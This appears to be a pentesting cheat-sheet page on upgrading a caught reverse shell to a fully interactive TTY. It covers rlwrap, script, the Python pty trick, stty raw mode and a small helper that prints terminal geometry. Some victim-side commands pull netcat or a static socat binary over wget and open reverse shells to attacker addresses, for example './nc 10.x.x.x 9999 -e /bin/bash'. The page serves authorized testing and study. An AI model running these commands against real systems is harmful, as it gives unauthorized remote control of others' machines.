# Shell Balancing

### Example of a bad shell

![](https://3989642013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fz4O59jPTfyNTpTEwEhZa%2Fuploads%2FDVmjqRWVcrPH3Lq7OaYl%2Fimage.png?alt=media\&token=3ad3a89b-650a-4f6c-9a5b-89c7678fdf26)

## Upgrade reverse shell to fully usable TTY shell

### rlwrap

* While receiving the connection from the target machine we can wrap the listener with `rlwrap`.
* `rlwrap` adds readline line editing and command history to a plain netcat shell, which mitigates some of its restrictions. It does not give a real TTY (no job control, and `ctrl+c` still kills the listener), so combine it with one of the pty methods below.
* It is not installed by default, so install it with `sudo apt install rlwrap`.

```bash
rlwrap nc -lvnp $port
```

### Using env-call and script

* `script` reads the `SHELL` environment variable to decide which shell to launch, so setting it inline forces `/bin/bash` even when the default system shell is `/bin/sh`. `/dev/null` is the typescript file, so no session log is written on the target.

```bash
SHELL=/bin/bash script -q /dev/null
```

### Using Script

* `script` comes pre-installed on most Linux systems (it is part of `util-linux`); check the man page.
* `-q` is for quiet (no start/done banners), `-c` runs the given command instead of an interactive shell, and `/dev/null` is the typescript output file, so nothing is logged on the target.

```bash
/usr/bin/script -qc /bin/bash /dev/null
```

Press **`ctrl+z`** to background the shell, then on the attacker machine:

```bash
stty raw -echo; fg; reset
```

* `stty raw -echo` stops the local terminal from interpreting keystrokes, so `ctrl+c`, tab completion and arrow keys reach the remote pty, and `fg` resumes the netcat job. The trailing `reset` only runs when the job returns, i.e. it restores the local terminal after you exit the remote shell. If the remote output is garbled, type `reset` in the remote shell as well.

### Python&#x20;

* Python is the most common tool for balancing the shell: `pty.spawn()` allocates a pseudo-terminal and runs the shell inside it, which is what job control, signals and tab completion need.

```bash
# on victim machine
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

`ctrl+z`

```bash
# on attacker machine
stty raw -echo
fg
```

```bash
# on victim machine
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>   # use the values printed by 'stty size' on the attacker machine
```
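The last step is where most people fumble: the rows and columns must match the attacker's terminal, otherwise `vim`, `less` and line wrapping misbehave. The helper below is an added example (not part of the original page) that reads the local geometry with `stty size` and prints the exact line to paste into the victim shell; the function names, the `24 80` fallback used when stdin is not a terminal, and the default `TERM` of `xterm-256color` are my assumptions, not anything the page specifies.

```bash
#!/usr/bin/env bash
# Added helper for the TTY upgrade procedure above (example code, not from the original page).
# Run it on the ATTACKER machine before 'stty raw -echo; fg' and paste its output into the
# foregrounded victim shell after 'reset'.

# build_fixup_cmd ROWS COLS [TERM]
# Prints the victim-side line that sets the pty geometry, TERM and SHELL.
# Returns 1 (prints nothing) if ROWS or COLS is not a positive integer.
build_fixup_cmd() {
  local rows="$1" cols="$2" term="${3:-xterm-256color}"   # default TERM is an assumption
  case "$rows$cols" in
    ''|*[!0-9]*) echo "build_fixup_cmd: rows and cols must be numeric" >&2; return 1 ;;
  esac
  printf 'stty rows %s columns %s; export TERM=%s; export SHELL=/bin/bash\n' \
    "$rows" "$cols" "$term"
}

# local_geometry
# Prints "ROWS COLS" for the current terminal. Falls back to the classic 24x80
# (an assumed default) when stdin is not a tty, e.g. when run from a script or pipe.
local_geometry() {
  local size
  if [ -t 0 ] && size=$(stty size 2>/dev/null) && [ -n "$size" ]; then
    echo "$size"
  else
    echo "24 80"
  fi
}

# Stand-alone usage: print the paste line for this terminal.
geom=$(local_geometry)
set -- $geom
build_fixup_cmd "$1" "$2" "${TERM:-xterm-256color}"
```

Because the output is a single line, it can be pasted into the raw-mode terminal in one go; everything after `stty raw -echo; fg` goes straight to the remote pty, so avoid pasting multi-line text there.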

### Perl

* If Python is not installed but Perl is available on the box, we can use this. Note that a plain `exec` only replaces the current process with `/bin/sh`; unlike `pty.spawn()` it does not allocate a pseudo-terminal, so it is useful for breaking out of a restricted environment rather than for a full TTY upgrade. The same applies to the Ruby and Lua one-liners below.

```bash
perl -e 'exec "/bin/sh";'
```

### Ruby

* If Ruby is installed on the box. The first form is typed inside an `irb` session, the second on the command line.

```bash
exec "/bin/sh"              # inside irb

ruby -e 'exec "/bin/sh"'
```

### Lua

```bash
lua -e "os.execute('/bin/sh')"
```

### Copy over NC and spawn a shell

* Using `wget` on the target and Python's built-in HTTP server on the attacker, `nc` is easily moved over to the target.
* Here we copy `nc` to the victim machine and then receive the shell. The web server and the listener must use different ports. `-e` needs a netcat that supports it (`netcat-traditional` or `ncat`; the OpenBSD `nc` does not), and a dynamically linked binary copied this way may fail on a target with a different libc, in which case use a static build.

```bash
# Attacker Machine

cp /usr/bin/nc . ; python3 -m http.server 9998      # Python 2: python -m SimpleHTTPServer 9998
nc -nlvp 9999                                        # listener on a different port than the web server
```

```bash
# Victim Machine

cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc
./nc 10.x.x.x 9999 -e /bin/bash
```

### Socat

* Prefer `socat` over plain `nc` for receiving connections: with a pty on the target side and the local terminal in raw mode it gives a proper interactive shell (job control, signals, tab completion) that behaves much like an SSH session.

```bash
# Attacker Machine

socat file:`tty`,raw,echo=0 TCP-L:1234
```

```bash
# Victim Machine

/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234

# if socat is not present on the target, download a static binary and use that

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234
```

* Resource - <https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat>
